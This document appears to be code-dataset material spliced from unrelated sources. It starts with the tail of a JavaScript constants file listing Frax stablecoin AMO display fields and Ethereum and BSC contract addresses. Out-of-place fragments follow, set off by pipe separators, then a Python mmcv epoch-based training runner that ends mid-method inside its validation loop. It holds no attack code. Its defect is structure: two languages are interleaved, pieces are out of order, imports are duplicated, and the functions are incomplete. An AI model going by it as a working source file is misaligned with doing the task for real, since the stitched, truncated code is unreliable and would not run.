{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
{ title: "FRAX3CRV in Vault", big_base: BIG18, symbol: 'USD' },
],
'OHM_AMO': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "OHM Value", big_base: BIG18, symbol: 'FRAX' },
{ title: "sOHM Value", big_base: BIG18, symbol: 'FRAX' },
{ title: "Bonded OHM Value", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total USD Value", big_base: BIG18, symbol: 'FRAX' },
],
'Convex_AMO': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
{ title: "FRAX3CRV in Vault", big_base: BIG18, symbol: 'USD' },
],
};
export const INVESTOR_REWARDS = {
'Investor_V1': [
{ title: "COMP", big_base: BIG18, symbol: 'COMP' }
],
'Investor_V2': [
{ title: "COMP", big_base: BIG18, symbol: 'COMP' },
{ title: "stkAAVE", big_base: BIG18, symbol: 'stkAAVE' },
{ title: "AAVE", big_base: BIG18, symbol: 'AAVE' }
],
'LendingAMO_V1': [
{ title: "FNX", big_base: BIG18, symbol: 'FNX' }
],
'CurveAMO_V1': [
{ title: "CRV", big_base: BIG18, symbol: 'CRV' }
],
'Convex_AMO': [
// { title: "CRV in contract", big_base: BIG18, symbol: 'CRV' },
{ title: "CRV claimable", big_base: BIG18, symbol: 'CRV' },
// { title: "CVX in contract", big_base: BIG18, symbol: 'CVX' },
{ title: "CVX claimable", big_base: BIG18, symbol: 'CVX' },
// { title: "cvxCRV in contract", big_base: BIG18, symbol: 'cvxCRV' },
{ title: "cvxCRV claimable", big_base: BIG18, symbol: 'cvxCRV' },
// { title: "FXS in contract", big_base: BIG18, symbol: 'FXS' },
{ title: "FXS claimable", big_base: BIG18, symbol: 'FXS' },
]
};
export const CONTRACT_ADDRESSES = {
mainnet: {
main: {
FRAX: '0x853d955aCEf822Db058eb8505911ED77F175b99e',
FXS: '0x3432B6A60D23Ca0dFCa7761B7ab56459D9C964D0',
FXB: '',
vesting: 'NOT_DEPLOYED_YET',
veFXS: '0xc8418aF6358FFddA74e09Ca9CC3Fe03Ca6aDC5b0', // Old: '0xcb75A1655c84589652D0f3A4605e5dDA8431F0a6'
veFXS_whitelist_checker: ''
},
weth: '0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2',
oracles: {
FRAX_WETH: '0x9b1A56A2E7164c43384448d82253781c1318A77E', // V1: 0xD18660Ab8d4eF5bE062652133fe4348e0cB996DA
// FRAX_USDC: '0x2E45C589A9F301A2061f6567B9F432690368E3C6', // V1: 0x2AD064cEBA948A2B062ba9AfF91c98B9F0a1f608
// FRAX_FXS: '0x4b85bD29f71b364ae6183C9721Ae5f596E7Bfd3d', // V1: 0xD0435BF68dF2B516C6382caE8847Ab5cdC5c3Ea7
FXS_WETH: '0x3B11DA52030420c663d263Ad4415a8A02E5f8cf8', // V1: '0x9e483C76D7a66F7E1feeBEAb54c349Df2F00eBdE'
// FXS_USDC: '0x1F70Af31D041f9C183E23EC6809c04eb8CA006a4', //V1: 0x28fdA30a6Cf71d5fC7Ce17D6d20c788D98Ff2c46
USDC_WETH: '0x69B9E922ecA72Cda644a8e32B8427000059388c6', // V1: '0x5e48C34f1005a514DaF0E1aEc53Dbb70fdC2C9F9'
FRAX_USDC: '0x2E45C589A9F301A2061f6567B9F432690368E3C6', // V1: 0x2AD064cEBA948A2B062ba9AfF91c98B9F0a1f608
},
oracles_other: {
FRAX_FXS: '0x4b85bD29f71b364ae6183C9721Ae5f596E7Bfd3d', // V1: 0xD0435BF68dF2B516C6382caE8847Ab5cdC5c3Ea7
FXS_USDC: '0x1F70Af31D041f9C183E23EC6809c04eb8CA006a4', //V1: 0x28fdA30a6Cf71d5fC7Ce17D6d20c788D98Ff2c46
FXS_USDC_PAIR: '0x9BAC32D4f3322bC7588BB119283bAd7073145355'
},
pid_related: {
pid_controller: "0x6de667F424E2b1b8fD39fC2e1b9a14c0103E9879", // V1: "0x60A315E04419290449dB4866481cb33d39df03A3",
reserve_tracker: "0x7215F84FE2f2F1726fFb42da923f3F04A72CF5E8" // V1: "0xF96882Dd0a4c8b2469084d2Db48768AA83B4a2f5"
},
investments: {
"yearn_yUSDC_V2": '0x5f18C75AbDAe578b483E5F43f12a39cF75b973a9',
"aave_aUSDC_Pool": '0x7d2768dE32b0b80b7a3454c06BdAc94A69DDc7A9',
"aave_aUSDC_Token": '0xBcca60bB61934080951369a648Fb03DF4F96263C',
'aave_incentives_controller': '0xd784927Ff2f95ba542BfC824c8a8a98F3495f6b5',
"compound_cUSDC": '0x39AA39c021dfbaE8faC545936693aC917d5E7563',
"compound_controller": '0x3d9819210A31b4961b30EF54bE2aeD79B9c9Cd3B',
"cream_crFRAX": '0xb092b4601850E23903A42EaCBc9D8A0EeC26A4d5',
"fnx_FPT_FRAX": '0x39ad661bA8a7C9D3A7E4808fb9f9D5223E22F763',
"fnx_FPT_B": '0x7E605Fb638983A448096D82fFD2958ba012F30Cd', // B = FNX
'fnx_IntegratedStake': '0x23e54F9bBe26eD55F93F19541bC30AAc2D5569b2',
'fnx_MinePool': '0x4e6005396F80a737cE80d50B2162C0a7296c9620',
'fnx_TokenConverter': '0x955282b82440F8F69E901380BeF2b603Fba96F3b',
'fnx_ManagerProxy': '0xa2904Fd151C9d9D634dFA8ECd856E6B9517F9785',
'fnx_CFNX': '0x9d7beb4265817a4923FAD9Ca9EF8af138499615d',
// "bzx_iUSDC_Fulcrum": '0x32e4c68b3a4a813b710595aeba7f6b7604ab9c15',
// "keeper_Pool_V2": '0x53463cd0b074E5FDafc55DcE7B1C82ADF1a43B2E',
// "keeper_kUSDC_Token": '0xac826952bc30504359a099c3a486d44E97415c77',
// "harvest_fUSDC": '0xf0358e8c3CD5Fa238a29301d0bEa3D63A17bEdBE',
// "harvest_DepositHelper": '0xF8ce90c2710713552fb564869694B2505Bfc0846',
// "harvest_NoMintRewardPool": '0x4F7c28cCb0F1Dbd1388209C67eEc234273C878Bd'
},
collateral: {
USDC: '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48',
USDC_V2: '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48',
USDT: '0xdAC17F958D2ee523a2206206994597C13D831ec7'
},
governance: '0xd74034C6109A23B6c7657144cAcBbBB82BDCB00E',
bond_issuers: {
issuer_v1: ''
},
pools: {
USDC: '0x3C2982CA260e870eee70c423818010DfeF212659',
USDC_V2: '0x1864Ca3d47AaB98Ee78D11fc9DCC5E7bADdA1c0d',
USDT: '0x7d3FCd3825AE54E8E8FFD3d0ce95882330d54968'
},
uniswap_other: {
router: '0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D',
factory: '0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f',
v3_positions_NFT: '0xC36442b4a4522E871399CD717aBDD847Ab11FE88'
},
pricing: {
swap_to_price: '0xa61cBe7E326B13A8dbA11D00f42531BE704DF51B',
chainlink_eth_usd: '0xBa6C6EaC41a24F9D39032513f66D738B3559f15a',
chainlink_fxs_usd: '0x679a15fe8B2108fdA30f292C92abCDE3a1246324'
},
bridges: {
eth_side: {
frax: {
avalanche: "",
bsc: "0x533e3c0e6b48010873B947bddC4721b1bDFF9648",
fantom: "0xC564EE9f21Ed8A2d8E7e76c085740d5e4c5FaFbE",
polygon: "0x40ec5B33f54e0E8A33A975908C5BA1c14e5BbbDf",
xdai: "0x88ad09518695c6c3712ac10a214be5109a655671"
},
fxs: {
avalanche: "",
bsc: "",
fantom: "0xC564EE9f21Ed8A2d8E7e76c085740d5e4c5FaFbE",
polygon: "0x40ec5B33f54e0E8A33A975908C5BA1c14e5BbbDf"
}
},
other_side: {
frax: {
avalanche: "0xDC42728B0eA910349ed3c6e1c9Dc06b5FB591f98",
bsc: "0x29cED01C447166958605519F10DcF8b0255fB379",
fantom: "0xaf319E5789945197e365E7f7fbFc56B130523B33",
polygon: "0x104592a158490a9228070E0A8e5343B499e125D0"
},
fxs: {
avalanche: "0xD67de0e0a0Fd7b15dC8348Bb9BE742F3c5850454",
bsc: "0xDE2F075f6F14EB9D96755b24E416A53E736Ca363",
fantom: "0x82F8Cb20c14F134fe6Ebf7aC3B903B2117aAfa62",
polygon: "0x3e121107F6F22DA4911079845a470757aF4e1A1b"
}
}
},
misc: {
timelock: '0x8412ebf45bAC1B340BbE8F318b928C466c4E39CA',
migration_helper: '0xe16723A08Ae054a8F20BDc0395389569011e78D6',
mint_utilities: '0xE054C1ab5D548E0144ab3F89a8f5809137819906',
staking_utilities: '0xE4de6E1DF1FE135D6462554d0Fd36A14d787f689',
investor_amo_V1: '0xEE5825d5185a1D512706f9068E69146A54B6e076',
investor_amo: '0xB8315Af919729c823B2d996B1A6DDE381E7444f1', // Old proxy: 0x2B4d259a8f6E765AD881C4C1D04045D629dA01b4
// investor_amo_impl: '0xde3c8aa7f53a69c595b7720045000a68cb9cb341', // Old V3: 0xEccA5a27B4f8f92a2bFFd006F20168A7188C0A0C, Old V2: '0xEE5825d5185a1D512706f9068E69146A54B6e076', // Old: 0xe09394AE14d7c3b1798e4dbEa4c280973B2689A4
// investor_amo_admin: '0x069c24600c2A03147D4E1D9b04d193151676F577',
lending_amo: '0x9507189f5B6D820cd93d970d67893006968825ef', // Old: 0xDA9d06166c2085988920Fb35EB2d322B4aaDF1EE
curve_amo_V1: '0xbd061885260F176e05699fED9C5a4604fc7F2BDC',
curve_amo_V2: '0xD103FEf74D05FbC20B5184FE85c7187735355DB3', //0xeF8c0b4902b985bF64B8cfF6BbCD0AC1FDc8d5d3', // Proxy: '0x7e983e4f98b16cee76f8f9a6a1e87b5861de8769'
curve_amo: '0x72170Cdc48C33a6AE6B3E83CD387ca3Fb9105da2', // Impl: 0xC3204838aF4CE0597476aDF367B4C9a3cf9a1B51
// curve_amo_impl: '0x5840db064e17480f8e8e74fd6714c9c316f7ddfe', // Old2: 0xbd061885260F176e05699fED9C5a4604fc7F2BDC', Old1: 0x77746DC37Deae008c7149EDc1b1A8D6d63e08Be5, Old2: 0x25e9702359bAf56E505F0BA981eeBFA23ceB030A, Old3: 0x19a47F38D39692617C9D9012eC0176C9ead00a5e
curve_amo_admin: '0x900909C07c2761d84C5d863FF5905102916DF69C',
fxs_1559_amo: '0x9C6a04871D11b33645ab592f68C41bb2B41F51EE', // Old1: '0xaf02be5968D8Fe9536e24E4c7e888C59A58Bc077'
fxs_1559_amo_v2: '0xC80C48862E4254F37047235298eDb6AA35717C24', // Proxy
stakedao_amo: '0x375278D3C65f29C1A90E8550888f1439cFeFe465', // Impl: 0xcf1e6926b2167f83ec3300bed04a672abd93e646
ohm_amo: '0x5699d20732a2EFa9A895EF04bb210aa751C4dB96', // Impl: 0x89a5CeC88598c0CE4d4E331D0b027499edd3dfFa
ohm_amo_admin: "0xE53d45ABe10Ce20427D20c5a1b6360Fa5BA0cE0A",
convex_amo: '0x49ee75278820f409ecd67063D8D717B38d66bd71', // Impl: 0x49f77ddd4d57636ab4c98d8f18ca5f4b5210983d
convex_amo_admin: "0xE53d45ABe10Ce20427D20c5a1b6360Fa5BA0cE0A",
// fxs_1559_amo_v2_impl: '0xCDe9A4e885B87a893b8817D136FD2F404B54294f'.
fxs_1559_amo_v2_admin: '0xCaa487D113ad1C34Ce128c4f3a2A437614C6a692', // Proxy admin
frax_gauge_v2: '0x72e158d38dbd50a483501c24f792bdaaa3e7d55c',
crvFRAX_vault: '0xB4AdA607B9d6b2c9Ee07A275e9616B84AC560139',
multisig: '0xFa27873EA2F0eA9DcD2052848C4A7F8ADE8a3936',
vefxs_yield_distributor: "0x19a0a70a68fbC604Bf20A03b787df8f7AC1d50f0",
vefxs_yield_distributor_v2: "0x62C4cf364078C98fA08AfDB4D3d8D87e780Ebd45",
vefxs_yield_distributor_v3: "0xed2647Bbf875b2936AAF95a3F5bbc82819e3d3FE",
frax3crv_curve_fxs_distributor: "0xBBbAf1adf4d39B2843928CCa1E65564e5ce99ccC", // MAY NEED TO CALL APPROVE FIRST
migration_bundle_utils: '0x239c957d42343B3d91FABc7c16E7F1e30Bc32E5B'
},
libraries: {
UniswapV2OracleLibrary: '0xeB85Dd2374a44F80342AcF8010d585Bda32B77a0',
UniswapV2Library: '0xC805D4126C3Ac9d0AD7bb94c3D5cD72E3CbCd6f6',
FraxPoolLibrary: '0xA11B9C88e4Bf89aD9A70f5d408ffB5A6d5FEb6A4',
FraxPoolLibrary_V2: '0xe1C3218134E7c69f3443bbd96A5851d193224f78',
},
reward_tokens: {
sushi: '0x6b3595068778dd592e39a122f4f5a5cf09c90fe2',
curve_dao: '0xd533a949740bb3306d119cc777fa900ba034cd52',
comp: '0xc00e94Cb662C3520282E6f5717214004A7f26888',
fnx: '0xeF9Cd7882c067686691B6fF49e650b43AFBBCC6B',
iq: '0x579CEa1889991f68aCc35Ff5c3dd0621fF29b0C9',
ohm: '0x383518188C0C6d7730D91b2c03a03C837814a899',
// rook: '0xfA5047c9c78B8877af97BDcb85Db743fD7313d4a',
// farm: '0xa0246c9032bC3A600820415aE600c6388619A14D',
// idle: '0x875773784Af8135eA0ef43b5a374AaD105c5D39e'
},
uni_v3_pools: {
NOTE: "Call getPool here (Factory) to find it: 0x1F98431c8aD98523631AE4a59f267346ea31F984",
NOTE2: "Do hardhat verify with the v1.0.0 uniswap-v3-core fork",
'Uniswap V3 FRAX/USDC': '0xc63B0708E2F7e69CB8A1df0e1389A98C35A76D52', // Uniswap V3 Pool
},
pair_tokens: {
'Uniswap FRAX/WETH': '0xFD0A40Bc83C5faE4203DEc7e5929B446b07d1C76',
'Uniswap FRAX/USDC': '0x97C4adc5d28A86f9470C70DD91Dc6CC2f20d2d4D',
'Uniswap V3 FRAX/USDC': '0xC36442b4a4522E871399CD717aBDD847Ab11FE88', // Uniswap V3 Positions NFT
'Uniswap FRAX/FXS': '0xE1573B9D29e2183B1AF0e743Dc2754979A40D237',
'Uniswap FXS/WETH': '0xecBa967D84fCF0405F6b32Bc45F4d36BfDBB2E81',
'Uniswap FRAX/IQ': '0xd6c783b257e662ca949b441a4fcb08a53fc49914',
'Uniswap FRAX/OHM': '0x2dce0dda1c2f98e0f171de8333c3c6fe1bbf4877',
// 'Sushi FRAX/FXS': '0xc218001e3D102e3d1De9bf2c0F7D9626d76C6f30',
// 'Sushi FXS/WETH': '0x61eB53ee427aB4E007d78A9134AaCb3101A2DC23',
// 'Curve FRAX-DAI-USDC-USDT': '0x83D2944d5fC10A064451Dc5852f4F47759F249B6', // Proxied Implementation: https://etherscan.io/address/0x2c7796c0590cc100d70af473993890d457cb2ac9#code
'Curve FRAX3CRV-f-2': '0xd632f22692fac7611d2aa1c0d552930d43caed3b', // Proxied For: https://etherscan.io/address/0x5f890841f657d90e081babdb532a05996af79fe6
'Saddle alUSD/FEI/FRAX/LUSD': '0xd48cF4D7FB0824CC8bAe055dF3092584d0a1726A'
},
staking_contracts: {
'Uniswap FRAX/WETH': '0xD875628B942f8970De3CcEaf6417005F68540d4f',
'Uniswap FRAX/USDC': '0xa29367a3f057F3191b62bd4055845a33411892b6',
'Uniswap V3 FRAX/USDC': '0xCbe6ea4725e4ba34aa215B95239DfA6E8854B49a', // Old2: '0x1C21Dd0cE3bA89375Fc39F1B134AD15671022660', // Old1: '0xF397Abd7495EB6FE4697F45b5BA17166f03533b9'
'Uniswap FRAX/FXS': '0xda2c338350a0E59Ce71CDCED9679A3A590Dd9BEC',
'Uniswap FXS/WETH': '0xDc65f3514725206Dd83A8843AAE2aC3D99771C88',
'Uniswap FRAX/IQ': '0xF37057823910653a554d996B49E3399DC87fAE1b', // V1: '0x35fc5Fd90e06c47c0D9dEBfEDB1daF55bCE14E6d',
'Uniswap FRAX/OHM': '0xfC77A420f56Dec53e3b91D7FC936902e132335FF',
// 'Sushi FRAX/FXS': '0x35302f77E5Bd7A93cbec05d585e414e14B2A84a8',
// 'Sushi FXS/WETH': '0x74C370990C1181303D20e9f0252437a97518B95B',
// 'Curve FRAX-DAI-USDC-USDT': '0xB88107bFB7aa9b6A5eC8784374018073e76d4DF0',
// 'Curve FRAX3CRV-f-2': '0xdFb6ef63eA2753C6598fcA1b220358F17E4d137e'
// 'Saddle alUSD/FEI/FRAX/LUSD': ""
},
external_farm_tokens: {
"Snowball S3F (FRAX + TUSD + USDT)": "",
// "SpiritSwap FRAX/FXS": "",
// "SpiritSwap FRAX/FTM": "",
// "QuickSwap FRAX/FXS": "0x4756ff6a714ab0a2c69a566e548b59c72eb26725",
// "QuickSwap FRAX/QUICK": "0x2aa7a18ceabf2ef893d2f7c0145cc45e6f10b223",
"Cream FRAX Lending": "",
"Curve FRAX3CRV-f-2": "",
"Yearn crvFRAX Vault (V2)": "",
"Sushi FRAX/FXS [Polygon]": "0xd53a56ae0f48c9a03660cd36c2e4ae20493a1eca",
"Sushi FRAX/USDC [Polygon]": "0x9e20a8d3501bf96eda8e69b96dd84840058a1cb0",
}
},
bsc: {
main: {
FRAX: '0x29ced01c447166958605519f10dcf8b0255fb379',
FXS: '0xde2f075f6f14eb9d96755b24e416a53e736ca363',
},
reward_tokens: {
cake: '0x0e09fabb73bd3ade0a17ecc321fd13a19e81ce82',
impossible_finance: '0xB0e1fc65C1a741b4662B813eB787d369b8614Af1',
},
pair_tokens: {
// 'PancakeSwap FRAX/FXS': '0x444be928a0091affe2be000f3ff904bc51b0172c',
// 'PancakeSwap FRAX/BUSD': '0x5C2c4df29748144A7177B4185828693FE375AF00',
'Impossible FRAX/IF': '0x9CA691841f1F5A0AE1B5A1eb125dE3c215f0b747',
'Impossible FXS/IF': '0x725aFC77770e023E18C1a07Cc7E2d1a42bA5F123',
},
staking_contracts: {
'Impossible FRAX/IF': '0x45dD6e5f65A5a526c09A50D612e3516ed6AB47d2',
}
}
// ropsten: {
// main: {
// FRAX: '0x5cD30EC40b6da67B65cFCd7A6C8c692AE70232a4',
// FXS: '0xd7145834f0d3D2F47f441F9302A095bd607C408d',
// vesting: 'NOT_DEPLOYED_YET'
// },
// weth: '0x9533696FdAd12ed1FC7917e9b56A8d549Df5d2b9',
// oracles: {
// FRAX_WETH: '0x6B1cA4438cb8f5E2797A4FC4F6F26CC9FF36C322',
// FRAX_USDC: '0x0d28d4330fDC8eE043B4336edA75Ae0A6c5dEE20',
// FRAX_USDT: '0x2c4C60255019334f1D73EEf25894248e0F419b50',
// FRAX_FXS: '0xBca2ADab420BB3928eEc843fa2039384Bfb19FD4',
// FXS_WETH: '0x87634e2b8e326925d8375995681808D754e56481',
// FXS_USDC: '0xdAf03fB7A1440Bfc724b3C7F4CF047C3aA4510A9',
// FXS_USDT: '0xDB0eD8ba93bcae27b624FFD0673FA75db11b4082',
// USDC_WETH: '0x0E6ad3EB50Fdd0EBcd45506dbF950b7d145128cc',
// USDT_WETH: '0x18390B775fd488c31a29c4E413ea04814554cFad'
// },
// collateral: {
// USDC: '0x62463ed90eE009fbea795D1049D44992a3612c7A',
// USDT: '0xBdD17dE7975765bC79C15F76967e2B7981887DbF'
// },
// governance: '0x4a8368662339D69377FF5bA77560DC6B907bCD85',
// pools: {
// USDC: '0xE0Df8E66BaE4aDdb8ec53C351cEC99e8A7240759',
// USDT: '0x4e61CF85ec7Aef00d3Fc02784C40Ff07283c2ceC'
// },
// uniswap_other: {
// router: '0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D',
// factory: '0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f'
// },
// pricing: { swap_to_price: '0xfE421F7abb81Fc6D1E092a60139a12a3b6be8ba8' },
// misc: {
// timelock: '0x6648307DFA2604B78595a1711118f92b04028eB4',
// migration_helper: '0xe13822b795EC5c5dD248a1CdC7B923B7d8c701D0'
// },
// libraries: {
// UniswapV2OracleLibrary: '0x8A0C94E55d574C0652757C879BC89C9698076EF8',
// UniswapV2Library: '0x0E207C1332B7B9108417dE9134bd621CF212Db72',
// FraxPoolLibrary: '0x144E03F0eA54b67EB26C0CF5a06028E99670d0FB'
// },
// pair_tokens: {
// 'Uniswap FRAX/WETH': '0x9A0b2d1C641561949f5f770711C3B05F86AB684e',
// 'Uniswap FRAX/USDC': '0x2Fa9D5bd5B04f12bD5e7be02a59C281Df66c817f',
// 'Uniswap FRAX/FXS': '0xC8b9A764d895E88F8D3383AeB599fE6F38503ef8',
// 'Uniswap FXS/WETH': '0x02F823CDc4C1adE61C51346CEDFE0bB242f554C0'
// },
// staking_contracts: {
// 'Uniswap FRAX/WETH': '0xE970806d91699eB59F08D849b248fc294302C05c',
// 'Uniswap FRAX/USDC': '0xF02f75ffdA683fe98784E1CA048D779d5cE68174',
// 'Uniswap FRAX/FXS': '0x7a646162bE361c2ae96d57920a06200544cf0c4F',
// 'Uniswap FXS/WETH': '0x5B05E43546534f81CcBcb10D33B03Ac02fab1201'
// }
// },
// ganache: {
// main: {
// FRAX: '0x4c2a7b591668988C6db9184d9df9394846Bc492d',
// FXS: '0xc2Bb9a3ae435AC36cC1eD2c4F64910B0CF8d8ec6',
// vesting: '0x68565D3dDDEe130152536d39eeD3c22A6653E584'
// },
// weth: '0x9970c452f919b117b9A5dDa473Cf205B6446f104',
// oracles: {
// FRAX_WETH: '0xB6F388B031C74936c53d51Cd850b0a8A8879c136',
// FRAX_USDC: '0x3013CeBaF374D838426bb2f3EEF6DA86D2552c27',
// FRAX_USDT: '0x1a6B2699FE1E833C28C1c9CF69bc55b2aa4a821B',
// FRAX_6DEC: '0x0037b9708901674243F823bbCE425b455e1C7825',
// FRAX_FXS: '0xeb3d1033E0B1ADE4f122A0174142dD2827A29eFd',
// FXS_WETH: '0xD48FeeDBb2f79bCc61c1661Bb5C550dE5c03b052',
// FXS_USDC: '0xD234BD8098cECB9CcbFf4Bf997f9B77408EC7C78',
// FXS_USDT: '0x279dB552A0f507DCd6F073b8d687eF0927959DcF',
// FXS_6DEC: '0x687e2a83f24FA1584f7aC272Ef8f5F510ea8F0A9',
// USDC_WETH: '0x8564DA758dcb6577F87C6d9c1b53f13777018602',
// USDT_WETH: '0xeC5C28352B0e8F9Eaf12239c86996e964298d60c',
// '6DEC_WETH': '0x12711D46063C413dA53d079e88c757b003b3513e'
// },
// collateral: {
// USDC: '0xff0B79ff7E0d0f5530dbb7Fa351cF9914Ab3f4E9',
// USDT: '0xD2A6475d9434CdE3Be7cD36debDC51C187be7dbD',
// '6DEC': '0x24ce4B5c5209678452fe236BD58A2e64F1d970b6'
// },
// governance: '0xB6D19571bDC969673b7fA8080D5D80CD80b2D312',
// pools: {
// USDC: '0xeF6981031cCaFfc9B4761A1dc6C5adAa495438c1',
// USDT: '0x8c2B93A83D1f60329df986e4f4219830f8f0bE9d',
// '6DEC': '0xd32fE8cc271214d911003c0011dB1f9AD796602c'
// },
// uniswap_other: { | // },
// pricing: { swap_to_price: '0xeF2c3d7D30d2893b787c0546f9A97084b4A8F10b' },
// misc: {
// timelock: '0xaD98E1e5fe7B9e79783373faE69632390f7825A0',
// migration_helper: '0xe40a86Fb20E497B423ff88c8deA4aa9994D4dC62'
// },
// libraries: {
// UniswapV2OracleLibrary: '0xF9814413328Cc3B8B92Fd3B251461b34552f7f42',
// UniswapV2Library: '0x43098B53277892e7eb9Be480Ef7054124591cE16',
// FraxPoolLibrary: '0x992A40bfF600fd2A1B7C214F61904Db6931403af'
// },
// pair_tokens: {
// 'Uniswap FRAX/WETH': '0x3483F272aba04b5dd819A4CdB3c4007dF909913c',
// 'Uniswap FRAX/USDC': '0xfBf1D205ADC586ad469A5a1a2a9451B2b4Bf1243',
// 'Uniswap FRAX/FXS': '0x7D6AD49359D3f9d0DCd7482FfD86B9C3b5a5a12D',
// // 'Uniswap FXS/WETH': '0x185c0F6A6e1D0998A22f3DA95BCc1F74b0A08Dd2'
// },
// staking_contracts: {
// 'Uniswap FRAX/WETH': '0x13c9aE42c43DF2FB46218DF80b6Abad7D52a82C5',
// 'Uniswap FRAX/USDC': '0x3b9c2b598589578e640627d8975De51ea7928918',
// 'Uniswap FRAX/FXS': '0xd4119c5057237373c629eD9F83B79635a3e2e90b',
// // 'Uniswap FXS/WETH': '0x6135f354e143fbEB5fB159A76EB2590cf4f086b6'
// }
// }
}
export { }; // Force this file to be a module | // router: '0x8Be085050e221bd8Db17489bD853800e600f6f58',
// factory: '0xF70bB588d44509a214Ad260C84BA0cfB031c29c5' |
my_runner.py | # Copyright (c) OpenMMLab. All rights reserved.
import os.path as osp
import platform
import shutil
import time
import warnings
import torch
import mmcv
import wandb
from mmcv.runner.hooks import HOOKS, Hook
from mmcv.runner.base_runner import BaseRunner
from mmcv.runner.builder import RUNNERS
from mmcv.runner.checkpoint import save_checkpoint
from mmcv.runner.utils import get_host_info
import copy
import logging
import os.path as osp
import warnings
from abc import ABCMeta, abstractmethod
import torch
from torch.optim import Optimizer
import mmcv
from mmcv.parallel import is_module_wrapper
from mmcv.runner.checkpoint import load_checkpoint
from mmcv.runner.dist_utils import get_dist_info
from mmcv.runner.hooks import HOOKS, Hook
from mmcv.runner.log_buffer import LogBuffer
from mmcv.runner.priority import Priority, get_priority
from mmcv.runner.utils import get_time_str
@RUNNERS.register_module()
class MyRunner(BaseRunner):
"""Epoch-based Runner.
This runner train models epoch by epoch.
"""
def __init__(self,
model,
batch_processor=None,
optimizer=None,
work_dir=None,
logger=None,
meta=None,
max_iters=None,
max_epochs=None,
with_wandb=None):
if batch_processor is not None:
if not callable(batch_processor):
raise TypeError('batch_processor must be callable, '
f'but got {type(batch_processor)}')
warnings.warn(
'batch_processor is deprecated, please implement '
'train_step() and val_step() in the model instead.',
DeprecationWarning)
# raise an error is `batch_processor` is not None and
# `model.train_step()` exists.
if is_module_wrapper(model):
_model = model.module
else:
_model = model
if hasattr(_model, 'train_step') or hasattr(_model, 'val_step'):
raise RuntimeError(
'batch_processor and model.train_step()/model.val_step() '
'cannot be both available.')
else:
assert hasattr(model, 'train_step')
# check the type of `optimizer`
if isinstance(optimizer, dict):
for name, optim in optimizer.items():
if not isinstance(optim, Optimizer):
raise TypeError(
f'optimizer must be a dict of torch.optim.Optimizers, '
f'but optimizer["{name}"] is a {type(optim)}')
elif not isinstance(optimizer, Optimizer) and optimizer is not None:
raise TypeError(
f'optimizer must be a torch.optim.Optimizer object '
f'or dict or None, but got {type(optimizer)}')
# check the type of `logger`
if not isinstance(logger, logging.Logger):
raise TypeError(f'logger must be a logging.Logger object, '
f'but got {type(logger)}')
# check the type of `meta`
if meta is not None and not isinstance(meta, dict):
raise TypeError(
f'meta must be a dict or None, but got {type(meta)}')
self.model = model
self.batch_processor = batch_processor
self.optimizer = optimizer
self.logger = logger
self.meta = meta
self.with_wandb = with_wandb
# create work_dir
if mmcv.is_str(work_dir):
self.work_dir = osp.abspath(work_dir)
mmcv.mkdir_or_exist(self.work_dir)
elif work_dir is None:
self.work_dir = None
else:
raise TypeError('"work_dir" must be a str or None')
# get model name from the model class
if hasattr(self.model, 'module'):
self._model_name = self.model.module.__class__.__name__
else:
self._model_name = self.model.__class__.__name__
self._rank, self._world_size = get_dist_info()
self.timestamp = get_time_str()
self.mode = None
self._hooks = []
self._epoch = 0
self._iter = 0
self._inner_iter = 0
if max_epochs is not None and max_iters is not None:
raise ValueError(
'Only one of `max_epochs` or `max_iters` can be set.')
self._max_epochs = max_epochs
self._max_iters = max_iters
# TODO: Redesign LogBuffer, it is not flexible and elegant enough
self.log_buffer = LogBuffer()
def register_optimizer_hook(self, optimizer_config):
if optimizer_config is None:
return
if isinstance(optimizer_config, dict):
optimizer_config.setdefault('type', 'MyHook')
hook = mmcv.build_from_cfg(optimizer_config, HOOKS)
else:
hook = optimizer_config
self.register_hook(hook, priority='ABOVE_NORMAL')
def run_iter(self, data_batch, train_mode, **kwargs):
if self.batch_processor is not None:
outputs = self.batch_processor(
self.model, data_batch, train_mode=train_mode, **kwargs)
elif train_mode:
outputs = self.model.train_step(data_batch, self.optimizer,
**kwargs)
else:
outputs = self.model.val_step(data_batch, self.optimizer, **kwargs)
if not isinstance(outputs, dict):
raise TypeError('"batch_processor()" or "model.train_step()"'
'and "model.val_step()" must return a dict')
if 'log_vars' in outputs:
self.log_buffer.update(outputs['log_vars'], outputs['num_samples'])
self.outputs = outputs
def train(self, data_loader, **kwargs):
self.model.train()
self.mode = 'train'
self.data_loader = data_loader
self._max_iters = self._max_epochs * len(self.data_loader)
self.call_hook('before_train_epoch')
time.sleep(2) # Prevent possible deadlock during epoch transition
for i, data_batch in enumerate(self.data_loader):
self._inner_iter = i
self.call_hook('before_train_iter')
self.run_iter(data_batch, train_mode=True, **kwargs)
self.call_hook('after_train_iter') |
@torch.no_grad()
def val(self, data_loader, **kwargs):
self.model.eval()
self.mode = 'val'
self.data_loader = data_loader
self.call_hook('before_val_epoch')
time.sleep(2) # Prevent possible deadlock during epoch transition
for i, data_batch in enumerate(self.data_loader):
self._inner_iter = i
self.call_hook('before_val_iter')
self.run_iter(data_batch, train_mode=False)
self.call_hook('after_val_iter')
self.call_hook('after_val_epoch')
if torch.distributed.is_initialized():
if torch.distributed.get_rank() == 0:
